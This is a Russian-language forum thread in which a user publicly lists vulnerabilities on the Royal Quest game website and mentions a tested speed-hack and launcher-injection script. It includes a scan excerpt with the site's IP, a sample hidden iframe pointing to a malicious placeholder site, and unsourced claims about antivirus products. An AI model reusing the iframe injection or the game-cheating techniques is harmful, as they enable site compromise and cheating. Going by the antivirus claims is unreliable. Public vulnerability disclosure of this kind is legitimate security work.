31 ответов в этой теме

[Fuksen]

Так как тех.поддержка не предоставила возможности пообщаться с техническим специалистом, выкладываю сюда. 

1) Пассивные XSS на royalquest.ru
    1.jpg   59.01К   1 Количество загрузок:
   2.jpg   84.93К   1 Количество загрузок:
Утечка cookie:
   CpT2leszbXs.jpg   94.19К   1 Количество загрузок:

Все атаки проведены разными методами, что свидетельствует о множественных уязвимостях.
 
 2) Вызов ошибки драйвера с помощью заведомо ложных вводимых параметров, а также с помощью уязвимости в &id[]:

       Vulnerable rq.jpg   40.15К   1 Количество загрузок:

     С помощью данной ошибки при грамотно построенном запросе можно сообщаться с файлом ошибок базы данных MySQL, который находится в открытом доступе. 

       Безымянный.jpg   141.1К   0 Количество загрузок:

3) Возможность менять статусы любого человека, будучи неавторизованным на сайте и на форуме.

    Можете посмотреть мои статусы в профиле, а также периодичность их изменения)
    Уязвимости были протестированы в браузерах Mozilla и IE. В Chrome и Opera работает при условии наличия скрипта xss auditor bypass.
     Все скриншоты и скрипты могу предоставить разработчикам в лс.
 

Сообщение отредактировал Fuksen, 26 January 2017 - 21:27 PM.

[MonkDead]

[Rufous]

[ангела]

сложна

[Armitage]

Прошу модератора удалить дубль темы с раздела Royal Test. Писал ночью, ошибся разделом(

[Fuksen]

Прошлые уязвимости пофикшены и на данный момент действительно не представляют явной угрозы.

Символы %$^&*()!@"' корректно фильтруются. Только вот теперь символы сравнения вообще нигде не работают, а не только в уязвимом месте)
К тому же, почему-то не доступна расширенная форма редактирования сообщений.

Новые уязвимости:
1) Открытый доступ к админке IPB:

 

 

2) Версия php в публичном доступе: 

Spoiler

+ Target IP:          188.127.248.201

+ Target Hostname:    www.royalquest.ru

+ Target Port:        80

+ Start Time:         2017-02-02 09:01:39 (GMT-6)

---------------------------------------------------------------------------

+ Server: nginx

+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.20

Сообщение отредактировал Fuksen, 04 February 2017 - 20:07 PM.

[puffick]

 

Это не твоих рук дело?  

[ExpertMag]

Вот кто напортачил)

[Fuksen]

 

 

 

Это не твоих рук дело?

 

Нет, не моих. Но скажу, что это не удивительно. На сайте обнаружены потенциально опасные "iframe вставки", которые могут вести на мошеннические сайты. На сайт, возможно, залит шелл (это можно сделать через тестовый редактор загрузки файлов на сайте, я его сюда специально не стал выкладывать, чтобы такого не произошло). К тому же, на форуме возможно проведение Directory Traversal attack, ведь форум не противится скачиванию любого файла по специально подготовленной ссылке.

P.S. Если вы думаете что вы ГУРУ в кодинге, или что можете безнаказанно вызывать скрипты и портить карму правильным пацанам, то вы ошиблись дверью

Spoiler

1)http://x.cnt.my/asyn...974608178250492
2)http://x.cnt.my/asyn...w.royalquest.ru

 

 

Пример вредоносного фрейма:

Spoiler

<iframe src="http://вредоносный_сайт.ру" width="0px" height="0px" style="hidden" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></iframe>

 

На заметку разработчикам:
https://www.cvedetai...-PHP-5.5.9.html

 

Версия php форума уязвима практически ко всему из этого списка, в том числе к эксплойтам с критическим рейтингом опасности 10.0, позволяющим выводить сервис из строя, удалённо выполнять вредоносный код.

Сообщение отредактировал Fuksen, 05 February 2017 - 01:39 AM.

[puffick]

Ты там в соседней теме про аваст сказал. А что на счет стандартного windows defender, который вкомплекте с виндой сейчас идет. Ему можно доверять? А то захламлять ноутбук еще каким-нибудь вечно жрущим процессом не хочется.

[Fuksen]

 

Ты там в соседней теме про аваст сказал. А что на счет стандартного windows defender, который вкомплекте с виндой сейчас идет. Ему можно доверять? А то захламлять ноутбук еще каким-нибудь вечно жрущим процессом не хочется.

 

По статистическим данным, подобные защитники от Майкрософт блокируют менее 75% угроз, не набирая даже проходной рейтинг.
Его нельзя назвать антивирусом, это защитник от слежения.
 

Вывод:

• очень слабый совокупный результат от независимых лабораторий;
• низкая эффективность в собственном тесте на блокировку вредоносного ПО;
• мизерный результат в тесте на блокировку вредоносных ссылок;
• посредственная защита от фишинга (на базе технологии Internet Explorer).

 

По моему мнению, самым лучшим вариантом в плане защиты компьютера от программ, эксплуатирующих уязвимости, в том числе эксплойтов, является Sophos (блокирует то, чего ещё нет в базах ни одной компании, занимающейся написанием антивирусов. Подсовывал ему эксплойт, написанный лично мной), но он очень требовательный.

Это не реклама, если что)

 

По поводу вечно жрущих процессов, то да, начиная от Windows Vista, их очень много. Например, бесполезный, как по мне, Superfetch, который не позволяет вообще нормально пользоваться компьютером, постоянно нагружая всё и вся на 100%.

Сообщение отредактировал Fuksen, 04 February 2017 - 21:08 PM.

[puffick]

Спасибо за столь подробный ответ. Грустно, но, видимо, придется жить с вирусами, пока нормальный комп не соберу, эх.

[Rufous]

Ты там в соседней теме про аваст сказал. А что на счет стандартного windows defender, который вкомплекте с виндой сейчас идет. Ему можно доверять? А то захламлять ноутбук еще каким-нибудь вечно жрущим процессом не хочется.

В целом все антивирусы говно. Тот же касперский по большей части выполняет роль шпионского ПО, собирая данные и отправляя их в InfoWatch (компания жены Касперского).

Бытует мнение что стандартоного виндовс дефендера, адблока, и фаервола достаточно. После перехода на 10 тоже так считаю, хотя есть возможность юзать халявную партнерскую лицензию нода с работы которую раньше и юзал.
В качестве защиты от фишинга просто пересел на оперу. У которой к слову сказать, свой блокировщик рекламы. А бонусом идет vpn, после покупки оперой SurfEasy.

Сообщение отредактировал Rufous, 04 February 2017 - 21:28 PM.

[puffick]

А в качестве защиты от фишинга просто пересел на оперу. У которой к слову сказать, свой блокировщик рекламы. А бонусом идет vpn, после покупки оперой SurfEasy.

Угу, до переустановки винды месяц назад тоже оперой пользовался, чисто из-за впна, очень удобно. Но пока не было необходимости ее ставить. SmartScreen защищает от совсем уж шлака, а обычная реклама пусть будет, нужно же сайтам и блоггерам что-то кушать.

[Rufous]

Блоггеры пусть налоги сначала начнуть платить... а то совсем зажрались. 

[puffick]

зажрались

Таких не смотрю.

[Fuksen]

Оп

 

[puffick]

Ничего не понял, слишком маленькое разрешение.

[Fuksen]

1) Ещё одна ошибка драйвера. Как я уже говорил ранее, с помощью данной ошибки можно сообщаться с базой данных. Возникает при попытке ввести некорректный запрос в поиске среди пользователей.

 

 

 

 

2) В мобильной версии сайта можно указать вместо почты ник человека на форуме. 

 

3) Админка IPB всё ещё в открытом доступе.

Сообщение отредактировал Fuksen, 19 February 2017 - 17:28 PM.

[Fuksen]

Ребят, ну вы жжёте))) 

 

Ещё порция XSS, уже на форуме)

 

Есть в любой теме.

 

 

 

Сообщение отредактировал Fuksen, 19 February 2017 - 18:18 PM.

[puffick]

Эх, понимать бы еще что-то кроме того, что все плохо. Может какую годную литературу или статьи подкинешь по инф.безопасности?
И да, не пробовал не сайт, а сервер игры ковырять? Там может похлеще грабли зарыты.

[Fuksen]

Эх, понимать бы еще что-то кроме того, что все плохо. Может какую годную литературу или статьи подкинешь по инф.безопасности?
И да, не пробовал не сайт, а сервер игры ковырять? Там может похлеще грабли зарыты.

Ковырять сервер игры - незаконно. Ты можешь заметить, что в этой теме я лишь показываю, что уязвимости присутствуют, но скрипты не выкладываю ни в коем случае, это может привести к серьёзным последствиям. Да и к тому же, человек, знакомый с MySQL, используя информацию об уязвимостях из этой темы, сможет с лёгкостью получить доступ к базе данных. Если интересно почитать об этом - напиши мне в личку, скину интересные статьи.

Если говорить про саму игру, из игры возможно выполнение каких-либо команд, но там стоит ограничение, обычный пользователь вряд ли сможет перезагрузить сервер, к примеру =)   

Сообщение отредактировал Fuksen, 19 February 2017 - 19:28 PM.

[Fuksen]

Найдена уязвимость, позволяющая увеличивать скорость передвижения (вплоть до мгновенного перемещения по карте), а также скорость атаки.

[puffick]

Найдена уязвимость, позволяющая увеличивать скорость передвижения (вплоть до мгновенного перемещения по карте), а также скорость атаки.

Видел видосики с этой уязвимостью, кидал в саппорт, толку ноль. А было это больше года назад еще.

[Fuksen]

Видел видосики с этой уязвимостью, кидал в саппорт, толку ноль. А было это больше года назад еще.

 

Видосов не видел, но в этом плане рк - не единственная игра с такой уязвимостью. Эта фишка присутствует с 2007 года в Айоне, к примеру.

Сообщение отредактировал Fuksen, 19 June 2017 - 05:12 AM.

[alxzoomer]

Надеюсь сама роялка не работает на mysql 

[Fuksen]

[Fuksen]

1. Сообщение с базой данных через файл ошибок MySQL снова в деле.
     

   

 

2. Теперь уязвимых ссылок для межсайтовой подделки запроса ещё больше. Также протестированы новые скрипты.

 

3. Протестирован скрипт автоматического увеличения скорости бега, атаки, а также свободной камеры (отдаления-приближения). Возможен инжект в сам лаунчер. Скрипт больше не нуждается в поиске нужного фрагмента памяти после каждого запуска игры.

 

4. Обнаружена ошибка типа "Cookie Not Marked As Secure", что позволяет перехватывать некоторые идентификационные данные с помощью подделки запроса.

 

 

5. Админ-панель до сих пор в открытом доступе.

 

 

6. Клиент получает и обрабатывает кучу ненужных данных, в том числе текстуры. P.S Может быть, из-за этого всё у всех постоянно лагает?

 

7. Обнаружена уязвимость типа "Full Path Disclosure".

Сообщение отредактировал Fuksen, 30 August 2017 - 03:37 AM.

[ProDuMan]

Аху.. кхм, КАКОЙ КОШМАР

Почините наконец эти лаги

[Kabriolet]

Почините наконец эти лаги

А что, лаги стали уже критическими уязвимостями? Как страшно жить...

Сообщение отредактировал Kabriolet, 01 September 2017 - 10:40 AM.